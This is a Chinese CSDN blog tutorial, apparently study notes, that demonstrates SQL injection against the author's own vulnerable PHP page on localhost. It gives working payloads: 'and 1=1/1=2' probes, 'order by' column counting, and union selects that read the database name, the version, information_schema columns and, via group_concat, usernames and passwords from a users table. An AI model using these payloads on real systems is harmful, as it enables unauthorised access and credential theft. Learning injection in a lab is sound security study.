Sql注入实战篇

最新推荐文章于 2024-06-08 15:21:52 发布

永不垂头

最新推荐文章于 2024-06-08 15:21:52 发布

阅读量1.3k

点赞数 1

分类专栏： Hacker Way 文章标签：安全

本文链接：https://blog.csdn.net/weixin_45650712/article/details/107620474

版权

Hacker Way 专栏收录该内容

78 篇文章 7 订阅

订阅专栏

学习笔记—Sql注入实战篇

一、编写注入的网页，用于实战。
index.php
在这里插入图片描述

link.php

在老板火狐中开启hackbar, 进行sql注入。

Google中hackbar破解方法：
https://www.fujieace.com/hacker/tools/hackbar.html

二、Sql注入基本流程（实战篇）：

输入单引号报如下错误
在这里插入图片描述
1=1与1=2的区别:（参考链接： https://www.cnblogs.com/xyz315/p/13043950.html）第一步，判断是否存在sql注入漏洞
构造 ?id=5 and 1=1 ，回车

页面返回正常
构造 ?id=5 and 1=2 ,回车

第二步:判断字段数
构造 ?id=1 and 1=1 order by 1 回车
http://127.0.0.1/7-27/index.php
?id=5)order by 1–+
–+注释语句，具体分析可参考下列文章：
https://blog.csdn.net/xiayun1995/article/details/86500605
在这里插入图片描述

输入1,2,3,4可以正常显示，输入5则报错：

第三步:查询相关内容
查询当前数据库名
构造 ?id=1 and 1=2 union select 1,database() 回车

查询当前数据库版本
构造 ?id=1 and 1=2 union select 1,version() 回车

在这里插入图片描述

查询当前数据库密码

拿到了密码
http://www.91ri.org/1551.html（万能密码实战）

http://127.0.0.1/7-27/index.php
?id=1 union select column_name,2,3,4 from information_schema.columns where table_schema=database()

http://127.0.0.1/7-27/index.php
?id=1 UNION SELECT 1,group_concat(user,0x3a,pass),3,4 from jokedb.users
在这里插入图片描述

至此，破解密码完成。

了解更多请关注下列公众号：
在这里插入图片描述

永不垂头

关注

1
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
Sql注入实战篇

学习笔记—Sql注入实战篇一、编写注入的网页，用于实战。index.phplink.php在老板火狐中开启hackbar, 进行sql注入。Google中hackbar破解方法：https://www.fujieace.com/hacker/tools/hackbar.html二、Sql注入基本流程（实战篇）：输入单引号报如下错误1=1与1=2的区别:（参考链接： https://www.cnblogs.com/xyz315/p/13043950.html）第一步，判断是否
复制链接

扫一扫

专栏目录